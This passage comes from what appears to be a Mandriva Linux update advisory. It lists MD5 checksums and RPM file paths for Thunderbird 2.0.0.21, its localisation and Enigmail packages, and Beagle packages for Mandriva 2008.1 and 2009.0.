 b5afffda865bfc8cbe1444da386ae0eb  2008.1/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 fed1d5de313ec681d7eb6b55f5af6e04  2008.1/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 625dd0fec0e3d65ff5b3932a93b6793c  2008.1/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 58c399b90332fb48aac2decb91f7d9a3  2008.1/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 2554d705e0edffd6f0d82b9643e3ee08  2008.1/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 0c2ced701dbf923627ab59a64cb1ea8c  2008.1/x86_64/mozilla-thunderbird-enigmail-tr-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 6d18e8167588ed4e6415d46ec7823cdb  2008.1/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 23da878fab4f4d27ce7c3282117385a5  2008.1/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 73c7bf0aac0b398ab3722e9c6fba8172  2008.1/x86_64/mozilla-thunderbird-es_AR-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 4ee40ea62fdf8be0554de5cc816a178f  2008.1/x86_64/mozilla-thunderbird-es_ES-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 dd2a10aae640d62fbd2ac8e771cc8b0f  2008.1/x86_64/mozilla-thunderbird-et_EE-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 52899407bc7fcd60765d3dd45f057463  2008.1/x86_64/mozilla-thunderbird-eu-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 482b7a5b81f5ff579f388238f686861a  2008.1/x86_64/mozilla-thunderbird-fi-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 3c586d5f1ca27939eb339b5f4224a330  2008.1/x86_64/mozilla-thunderbird-fr-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 d2be20d1f99a764555a1acc68c8ea4f7  2008.1/x86_64/mozilla-thunderbird-ga-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 0b9a74d07874cb26aec0de16f189c1cf  2008.1/x86_64/mozilla-thunderbird-gu_IN-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 c1b6dae27007cf925930e3af08a3cc98  2008.1/x86_64/mozilla-thunderbird-he-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 02b78b3a43aadc8b41533ecc0302a5cf  2008.1/x86_64/mozilla-thunderbird-hu-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 1d036ee983e7928e2f816f24a1a21831  2008.1/x86_64/mozilla-thunderbird-it-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 9da0d974c7bed27bad4f064b31b7f226  2008.1/x86_64/mozilla-thunderbird-ja-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 f855c46cb9c5d0dac736a3f17ab9012d  2008.1/x86_64/mozilla-thunderbird-ko-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 3d9a79e3902a7f483b121d0a7a8f0a2c  2008.1/x86_64/mozilla-thunderbird-lt-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 87bef7621a861f6db127847f7986cc5e  2008.1/x86_64/mozilla-thunderbird-mk-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 1a88a2b8f640758b49464d08cc193d1a  2008.1/x86_64/mozilla-thunderbird-moztraybiff-1.2.3-4.5mdv2008.1.x86_64.rpm
 95dd7d1839f9d81eb5989892984dbe38  2008.1/x86_64/mozilla-thunderbird-nb_NO-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 2c59aab9e083890b282e4abfdd1b891b  2008.1/x86_64/mozilla-thunderbird-nl-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 8b2e44b721691f1c16149c7c7538ba4a  2008.1/x86_64/mozilla-thunderbird-nn_NO-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 23053d3c7c9b94b5e1aafd33079b5adc  2008.1/x86_64/mozilla-thunderbird-pa_IN-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 fe3cfac07c0d4096f290214460da044a  2008.1/x86_64/mozilla-thunderbird-pl-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 4318d659e9f75e76e4a25a152c24392b  2008.1/x86_64/mozilla-thunderbird-pt_BR-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 7ac0cc60a73d6af0e897894ba3cef34c  2008.1/x86_64/mozilla-thunderbird-pt_PT-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 be341d7bd6165fbfbafe20e9b89041b3  2008.1/x86_64/mozilla-thunderbird-ru-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 294d5624cbd12bdfb06bad5801a5bf87  2008.1/x86_64/mozilla-thunderbird-sk-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 ba6d86f36e23ce9b0b2f7b1a0912723f  2008.1/x86_64/mozilla-thunderbird-sl-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 86f6ee227d4f23f9e7ed8c2b79de61e0  2008.1/x86_64/mozilla-thunderbird-sv_SE-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 0eb4c68731ea7f32285ee40a7e9e78d9  2008.1/x86_64/mozilla-thunderbird-tr-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 c9cb3c6b1cc51657367bacd72e8bb748  2008.1/x86_64/mozilla-thunderbird-uk-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 ee0653a4966bad09e0ed9c57e8e51c11  2008.1/x86_64/mozilla-thunderbird-zh_CN-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 c5f98637de06f378644d19fb6eb0ce7e  2008.1/x86_64/mozilla-thunderbird-zh_TW-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 8a1b92c08cf3382b5d4db2ca0e3a409b  2008.1/x86_64/nsinstall-2.0.0.21-0.1mdv2008.1.x86_64.rpm 
 b1a3a4869b3b969924e1e9719179adf0  2008.1/SRPMS/beagle-0.3.3-7.3mdv2008.1.src.rpm
 56a027d87b2f062923541364d2596f7b  2008.1/SRPMS/mozilla-thunderbird-2.0.0.21-0.1mdv2008.1.src.rpm
 caad8a5d4126e0d3debbb0ae1ec05249  2008.1/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.21-0.1mdv2008.1.src.rpm
 7e919606f3e7f51d9e1b9c390fe8af1d  2008.1/SRPMS/mozilla-thunderbird-l10n-2.0.0.21-0.1mdv2008.1.src.rpm
 e677b10ed572757b7e3dfc314eb88233  2008.1/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4.5mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 5269c6bcaeb6f516648be45ce4e8b8a1  2009.0/i586/beagle-0.3.8-13.8mdv2009.0.i586.rpm
 2e6a86395313fbb8035f29112e22cf4a  2009.0/i586/beagle-crawl-system-0.3.8-13.8mdv2009.0.i586.rpm
 6b717496944a7a59d82bde556ab88144  2009.0/i586/beagle-doc-0.3.8-13.8mdv2009.0.i586.rpm
 1a201c74f8457a1958e618ebf059676c  2009.0/i586/beagle-epiphany-0.3.8-13.8mdv2009.0.i586.rpm
 7e0e279e4085cba6ca46652e18d8bd01  2009.0/i586/beagle-evolution-0.3.8-13.8mdv2009.0.i586.rpm
 f5e498f6f05557e5feba22e427e3643f  2009.0/i586/beagle-gui-0.3.8-13.8mdv2009.0.i586.rpm
 d52ed1d924e9567e911eb1b26549fd4e  2009.0/i586/beagle-gui-qt-0.3.8-13.8mdv2009.0.i586.rpm
 27b8570542452c6e38514a47dbd81ed8  2009.0/i586/beagle-libs-0.3.8-13.8mdv2009.0.i586.rpm
 a6d1d9e6012d417daafa0125651574ed  2009.0/i586/firefox-ext-beagle-0.3.8-13.8mdv2009.0.i586.rpm
 06bc203a2f9198abf6833ddc1628e55c  2009.0/i586/mozilla-thunderbird-2.0.0.21-0.1mdv2009.0.i586.rpm
 8182073dd693c716f56e1a3f5233dabb  2009.0/i586/mozilla-thunderbird-af-2.0.0.21-0.1mdv2009.0.i586.rpm
 3cd63100b09feb59698f5d66dcb6bc79  2009.0/i586/mozilla-thunderbird-be-2.0.0.21-0.1mdv2009.0.i586.rpm
 e1a12c90998bcdd7223f924b617942d8  2009.0/i586/mozilla-thunderbird-beagle-0.3.8-13.8mdv2009.0.i586.rpm
 03cd06542bfdbdf6c1c427fa2be37d0a  2009.0/i586/mozilla-thunderbird-bg-2.0.0.21-0.1mdv2009.0.i586.rpm
 5477e107a2fbc544c6395777fa876a50  2009.0/i586/mozilla-thunderbird-ca-2.0.0.21-0.1mdv2009.0.i586.rpm
 8ebd375dbb8e67e529514e7a7991aa3e  2009.0/i586/mozilla-thunderbird-cs-2.0.0.21-0.1mdv2009.0.i586.rpm
 235ac8e292c8da4ae1bc895ecf0917e4  2009.0/i586/mozilla-thunderbird-da-2.0.0.21-0.1mdv2009.0.i586.rpm
 fd23b3f53546154a1d0b7ed6b0be99d6  2009.0/i586/mozilla-thunderbird-de-2.0.0.21-0.1mdv2009.0.i586.rpm
 197edce40289d19b58141b6a79d63807  2009.0/i586/mozilla-thunderbird-devel-2.0.0.21-0.1mdv2009.0.i586.rpm
 fe000aa6025f8ef1400afc21326e8bea  2009.0/i586/mozilla-thunderbird-el-2.0.0.21-0.1mdv2009.0.i586.rpm
 4b7b815183de9582164acce03f2c2f19  2009.0/i586/mozilla-thunderbird-en_GB-2.0.0.21-0.1mdv2009.0.i586.rpm
 b686f67a70d535f47f4f7610b8e0ca4f  2009.0/i586/mozilla-thunderbird-enigmail-2.0.0.21-0.1mdv2009.0.i586.rpm
 f62a0cf8e9c6fe56a50ebb50c906dc43  2009.0/i586/mozilla-thunderbird-enigmail-ar-2.0.0.21-0.1mdv2009.0.i586.rpm
 0a176ca28c034cd62d40afe839ec3e30  2009.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.21-0.1mdv2009.0.i586.rpm
 f746b5ceb19425dd79c1369d047f0ece  2009.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.21-0.1mdv2009.0.i586.rpm
 4ba2ada995788e089a8644ddd0079a33  2009.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.21-0.1mdv2009.0.i586.rpm
 a1e0087d877655acd382613db12cbb95  2009.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.21-0.1mdv2009.0.i586.rpm
 2b699e756b849fe60246a22dd34ee825  2009.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.21-0.1mdv2009.0.i586.rpm
 1b372ce69415d0d5a6f2a66fc9c8dd54  2009.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.21-0.1mdv2009.0.i586.rpm
 47d49b0690287aefa5f2cfb149c20bd4  2009.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.21-0.1mdv2009.0.i586.rpm
 8c0b1dace07b24982d19978b1d2608c7  2009.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.21-0.1mdv2009.0.i586.rpm
 705a5a76b2e24ab2298a1a2db8d8c6a9  2009.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.21-0.1mdv2009.0.i586.rpm
 da3660389f3cb38fa118ba0514780c6a  2009.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.21-0.1mdv2009.0.i586.rpm
 122e16d8714ba0415973c71e2ef9cf11  2009.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.21-0.1mdv2009.0.i586.rpm
 2211fe7bf25d48ac80c33ea196cfd7a6  2009.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.21-0.1mdv2009.0.i586.rpm
 1d979a9a7248949ee0fea51772e097b6  2009.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.21-0.1mdv2009.0.i586.rpm
 c6b40c6d68a1cceff11aa5084ebbd863  2009.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.21-0.1mdv2009.0.i586.rpm
 3c78314eb718dbff67d8e78064a422ad  2009.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.21-0.1mdv2009.0.i586.rpm
 124015bec63a3c1b0e1489b88d9b1a57  2009.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.21-0.1mdv2009.0.i586.rpm
 43c2ceb55d5d8a0bf55531251e739ca4  2009.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.21-0.1mdv2009.0.i586.rpm
 1547650bd7b1a4da97f49bb0c8d38610  2009.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.21-0.1mdv2009.0.i586.rpm
 27cb222b5e7142d05c52f373282f97e1  2009.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.21-0.1mdv2009.0.i586.rpm
 4b0798a64092d1092893ddf4709161d0  2009.0/i586/mozilla-thunderbird-enigmail-sk-2.0.0.21-0.1mdv2009.0.i586.rpm
 e5c7b645fddb7c8c6f345617b1a9bba3  2009.0/i586/mozilla-thunderbird-enigmail-sl-2.0.0.21-0.1mdv2009.0.i586.rpm
 2ef734f73bbf8c8423438b3c0ebb2782  2009.0/i586/mozilla-thunderbird-enigmail-sv-2.0.0.21-0.1mdv2009.0.i586.rpm
 6402873003a82c140abc4fb1fb36b026  2009.0/i586/mozilla-thunderbird-enigmail-tr-2.0.0.21-0.1mdv2009.0.i586.rpm
 cee8f9118121ae90a3332a8bc3b104a7  2009.0/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.21-0.1mdv2009.0.i586.rpm
 cd5333029c20d3914a35f3bdbd189a2f  2009.0/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.21-0.1mdv2009.0.i586.rpm
 026a04bfb9572aa792122940795058bc  2009.0/i586/mozilla-thunderbird-es_AR-2.0.0.21-0.1mdv2009.0.i586.rpm
 963ae92b34b2cf8bd5fa7973ff7933f6  2009.0/i586/mozilla-thunderbird-es_ES-2.0.0.21-0.1mdv2009.0.i586.rpm
 754606a0a9685d347c308d8303eb6250  2009.0/i586/mozilla-thunderbird-et_EE-2.0.0.21-0.1mdv2009.0.i586.rpm
 62689b5026e9455df15480d23323040a  2009.0/i586/mozilla-thunderbird-eu-2.0.0.21-0.1mdv2009.0.i586.rpm
 b859afd1f643cd5b82177948fef9a15f  2009.0/i586/mozilla-thunderbird-fi-2.0.0.21-0.1mdv2009.0.i586.rpm
 d6ee6fde2394a8674d50b7da7a9cd244  2009.0/i586/mozilla-thunderbird-fr-2.0.0.21-0.1mdv2009.0.i586.rpm
 b165773ef913a99c7830070e30683288  2009.0/i586/mozilla-thunderbird-ga-2.0.0.21-0.1mdv2009.0.i586.rpm
 746559c214cf0b6be7bb3f8dcef2a4de  2009.0/i586/mozilla-thunderbird-gu_IN-2.0.0.21-0.1mdv2009.0.i586.rpm
 deb3bc6fae7973edc091fc56926b2d9e  2009.0/i586/mozilla-thunderbird-he-2.0.0.21-0.1mdv2009.0.i586.rpm
 9f6d722bbef5d9409f5169db1c55ca58  2009.0/i586/mozilla-thunderbird-hu-2.0.0.21-0.1mdv2009.0.i586.rpm
 1d12a84c9ed741abdc6f4900b52b5920  2009.0/i586/mozilla-thunderbird-it-2.0.0.21-0.1mdv2009.0.i586.rpm
 f6bbd5398788d45b4b74efa6e9d9b318  2009.0/i586/mozilla-thunderbird-ja-2.0.0.21-0.1mdv2009.0.i586.rpm
 78eee0e10d5a7a4ef494e08c91cb8f42  2009.0/i586/mozilla-thunderbird-ko-2.0.0.21-0.1mdv2009.0.i586.rpm
 ee1725996dfb17dea0287f458321262e  2009.0/i586/mozilla-thunderbird-lt-2.0.0.21-0.1mdv2009.0.i586.rpm
 426e6e987b176669531312b5ff18bf76  2009.0/i586/mozilla-thunderbird-mk-2.0.0.21-0.1mdv2009.0.i586.rpm
 57f348616939da1fa89d4d5eb69902df  2009.0/i586/mozilla-thunderbird-moztraybiff-1.2.4-1.3mdv2009.0.i586.rpm
 4842810a7770f9676b30f72af04f8812  2009.0/i586/mozilla-thunderbird-nb_NO-2.0.0.21-0.1mdv2009.0.i586.rpm
 bf0e50f7a284770a87361cfe431d4bb2  2009.0/i586/mozilla-thunderbird-nl-2.0.0.21-0.1mdv2009.0.i586.rpm
 4a978638cd99ffb9a08876bf25c564bc  2009.0/i586/mozilla-thunderbird-nn_NO-2.0.0.21-0.1mdv2009.0.i586.rpm
 a6f70cc5a3ff26cd23fefce0deca6d51  2009.0/i586/mozilla-thunderbird-pa_IN-2.0.0.21-0.1mdv2009.0.i586.rpm
 f341f43bd098a3f1b2b2f5f195106ae5  2009.0/i586/mozilla-thunderbird-pl-2.0.0.21-0.1mdv2009.0.i586.rpm
 e9e68a68421e369f6989bf72a38d2f34  2009.0/i586/mozilla-thunderbird-pt_BR-2.0.0.21-0.1mdv2009.0.i586.rpm
 d9e36dae610eb7c08c67e58ebc6dd547  2009.0/i586/mozilla-thunderbird-pt_PT-2.0.0.21-0.1mdv2009.0.i586.rpm
 64967c9d9b9a89ce065239a45db7c1e5  2009.0/i586/mozilla-thunderbird-ru-2.0.0.21-0.1mdv2009.0.i586.rpm
 df75b2540916bf54433214d210b127c4  2009.0/i586/mozilla-thunderbird-sk-2.0.0.21-0.1mdv2009.0.i586.rpm
 88476fd672f6bcfd3f84bc904c96342c  2009.0/i586/mozilla-thunderbird-sl-2.0.0.21-0.1mdv2009.0.i586.rpm
 8ff392ad882feb0072681a63faaeb9b2  2009.0/i586/mozilla-thunderbird-sv_SE-2.0.0.21-0.1mdv2009.0.i586.rpm
 067d6e56db9e05ed56a03225a6b6a891  2009.0/i586/mozilla-thunderbird-tr-2.0.0.21-0.1mdv2009.0.i586.rpm
 a6e0c83c56df9971794675b7b18bf93e  2009.0/i586/mozilla-thunderbird-uk-2.0.0.21-0.1mdv2009.0.i586.rpm
 ae4adbff3c688eea014ba5b15f7eb292  2009.0/i586/mozilla-thunderbird-zh_CN-2.0.0.21-0.1mdv2009.0.i586.rpm
 f815e5fc44029e45e4e3ced1bfa06589  2009.0/i586/mozilla-thunderbird-zh_TW-2.0.0.21-0.1mdv2009.0.i586.rpm
 bdd7f08766c758328767ffba1cb24598  2009.0/i586/nsinstall-2.0.0.21-0.1mdv2009.0.i586.rpm 
 b67711bfdf7ddba95e784ca4a6c830e1  2009.0/SRPMS/beagle-0.3.8-13.8mdv2009.0.src.rpm
 69a72ca28ceb4058734f0dc92983c6f8  2009.0/SRPMS/mozilla-thunderbird-2.0.0.21-0.1mdv2009.0.src.rpm
 2e8a125773ebcc6c381d0db721143844  2009.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.21-0.1mdv2009.0.src.rpm
 c055e5c044ce363b28ec16c1b7ed460f  2009.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.21-0.1mdv2009.0.src.rpm
 79b05327f92194b2458a23d89e74b9f7  2009.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.4-1.3mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 8c5e18382197b99f1984feb166654ff3  2009.0/x86_64/beagle-0.3.8-13.8mdv2009.0.x86_64.rpm
 6a23b362c4f762f1386ec75b264c9be1  2009.0/x86_64/beagle-crawl-system-0.3.8-13.8mdv2009.0.x86_64.rpm
 335c2f03587e294500c41c01bc97e9c4  2009.0/x86_64/beagle-doc-0.3.8-13.8mdv2009.0.x86_64.rpm
 cf00b57ace8b9b1611c09dd60cc82c61  2009.0/x86_64/beagle-epiphany-0.3.8-13.8mdv2009.0.x86_64.rpm
 eee38497577de22bffacf0b77be8a3e6  2009.0/x86_64/beagle-evolution-0.3.8-13.8mdv2009.0.x86_64.rpm
 6fe93210ce66611de629c390f7fd124e  2009.0/x86_64/beagle-gui-0.3.8-13.8mdv2009.0.x86_64.rpm
 19abb0a9f120fd537ecec14c3926645f  2009.0/x86_64/beagle-gui-qt-0.3.8-13.8mdv2009.0.x86_64.rpm
 92d216b9d0ad5b8821d448f20dca1979  2009.0/x86_64/beagle-libs-0.3.8-13.8mdv2009.0.x86_64.rpm
 e3fa38f0402b3aabce47304943ddd65f  2009.0/x86_64/firefox-ext-beagle-0.3.8-13.8mdv2009.0.x86_64.rpm
 6e33b527451672bdc467b644fd675441  2009.0/x86_64/mozilla-thunderbird-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 85f72280d88b6d2d8e7e93f6f9a4ff3c  2009.0/x86_64/mozilla-thunderbird-af-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 53c20446387a078c0a6829b2358570d6  2009.0/x86_64/mozilla-thunderbird-be-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 0464ca16c0b58fc74e5e9a4b8457a2ec  2009.0/x86_64/mozilla-thunderbird-beagle-0.3.8-13.8mdv2009.0.x86_64.rpm
 c74be57c17f63a9a4fff1110b0f48ff6  2009.0/x86_64/mozilla-thunderbird-bg-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 1ffa4eb88f84dedf4330857d2b0e7dd2  2009.0/x86_64/mozilla-thunderbird-ca-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 2f3494e657e560fc01dda35825db8900  2009.0/x86_64/mozilla-thunderbird-cs-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 24eef176684f45646534e17dc00e647b  2009.0/x86_64/mozilla-thunderbird-da-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 8ada54ad63ecfc924eac2e4f83e5ff50  2009.0/x86_64/mozilla-thunderbird-de-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 9cdbbcbf518279c88fbef759942c26c3  2009.0/x86_64/mozilla-thunderbird-devel-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 23d999535d1d30fe057d1ff1669e926f  2009.0/x86_64/mozilla-thunderbird-el-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 1bc23b436e1c0f7a8c3f8db0dfd0df75  2009.0/x86_64/mozilla-thunderbird-en_GB-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 66e58242b356b2df1580bd76bd7ddd80  2009.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 d64814e6f087ff86ebddc7cbd63c6002  2009.0/x86_64/mozilla-thunderbird-enigmail-ar-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 c50ff241d873b57a39496dbe1427c91a  2009.0/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 bab4794e8452bd7094815c421bd95f66  2009.0/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 74ce173f6b5ddebaa41b88a412050977  2009.0/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 8cdb4e97584e57507a6352d76156e98e  2009.0/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 32d40d60001d285c5cd7161dbdb32869  2009.0/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 d6ad895935e771b31167ea89399e6b6f  2009.0/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 f506f4302860fa1695cfc1159a63acb8  2009.0/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 e932a5c91519796c16ff4d9f27648c90  2009.0/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 2581796bf19805166d952f3d3cef87f5  2009.0/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 f10e6febb0ecca2585edac8bb461930a  2009.0/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 4f7279e264adc9c76202a52cb61dec2d  2009.0/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 46a519a91d353924c1f9268ccb42002f  2009.0/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 4dcfd64ad3d755d685f1f259ace37346  2009.0/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 de0c9b3fc710a7d40b0dedba272d7340  2009.0/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 c595cccbc4cdd92f1796a45a0d5a0f3c  2009.0/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 99c5df71315bcdb0fbd1ae1581c74141  2009.0/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 fd45e9dec49a27c7461145368c627bef  2009.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 c39a2a43c3d33908e938fe488007fc99  2009.0/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 8577c1169a23be3b8e960681d08626c2  2009.0/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 fdd8380d4fadda27bbd21beadb73167e  2009.0/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 7cb19c9b65652ec3f3ae3805681f7b50  2009.0/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 a3e3f37c0af8fea1796e1db0816d5af8  2009.0/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 1258e00c7726076cd96612fd5ca9c850  2009.0/x86_64/mozilla-thunderbird-enigmail-tr-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 a641a10075e635a87a898ccd32859b9e  2009.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 ec31941b6be554678a1439c614c7edb5  2009.0/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 7e0f97b0b9166e2ad3bde4a9d71b929f  2009.0/x86_64/mozilla-thunderbird-es_AR-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 5233543179b89939c4c6173ee387f3da  2009.0/x86_64/mozilla-thunderbird-es_ES-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 691b9e03278dd191e034e775b793ba96  2009.0/x86_64/mozilla-thunderbird-et_EE-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 e5f8d083a4281906983202a48b59d406  2009.0/x86_64/mozilla-thunderbird-eu-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 b35101d69bb8b64d0947addf1e67ba8d  2009.0/x86_64/mozilla-thunderbird-fi-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 76466b359893e9050e67a9b11d5d1b96  2009.0/x86_64/mozilla-thunderbird-fr-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 7b9647a2a02f22de4ae3161b99282fa9  2009.0/x86_64/mozilla-thunderbird-ga-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 d4a044179ddc9987b200fcc523dfc19f  2009.0/x86_64/mozilla-thunderbird-gu_IN-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 fad4d923373c539821ccaef02086644d  2009.0/x86_64/mozilla-thunderbird-he-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 19de16296aa2d6989c82cb4d1088bd3c  2009.0/x86_64/mozilla-thunderbird-hu-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 6e5dfe44a6e8738e6730080a2ce20063  2009.0/x86_64/mozilla-thunderbird-it-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 ed358ff84690d06131dcde828ba325e8  2009.0/x86_64/mozilla-thunderbird-ja-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 ff743011137fe85bd9767fa9500b6f2e  2009.0/x86_64/mozilla-thunderbird-ko-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 5a9fae7c51961673de675bdf0006f832  2009.0/x86_64/mozilla-thunderbird-lt-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 153a05b4668433c6dcb609775ecbcdc0  2009.0/x86_64/mozilla-thunderbird-mk-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 6d68eeb13b9bf1b370dc34258e3c114d  2009.0/x86_64/mozilla-thunderbird-moztraybiff-1.2.4-1.3mdv2009.0.x86_64.rpm
 d7942e429dcaa69be027d0e667827048  2009.0/x86_64/mozilla-thunderbird-nb_NO-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 5e0fcad82bcac9f75f16b340a9d4299f  2009.0/x86_64/mozilla-thunderbird-nl-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 02291a37a46b9b142f741b3362213353  2009.0/x86_64/mozilla-thunderbird-nn_NO-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 9333da261295c193464264f2c7dfef22  2009.0/x86_64/mozilla-thunderbird-pa_IN-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 c2a32c63341a086ed67e65d6d500cdcc  2009.0/x86_64/mozilla-thunderbird-pl-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 81a6cc24160c42ebaf9c75872bafe12f  2009.0/x86_64/mozilla-thunderbird-pt_BR-2.0.0.21-0.1mdv2009.0.x86_64.rpm
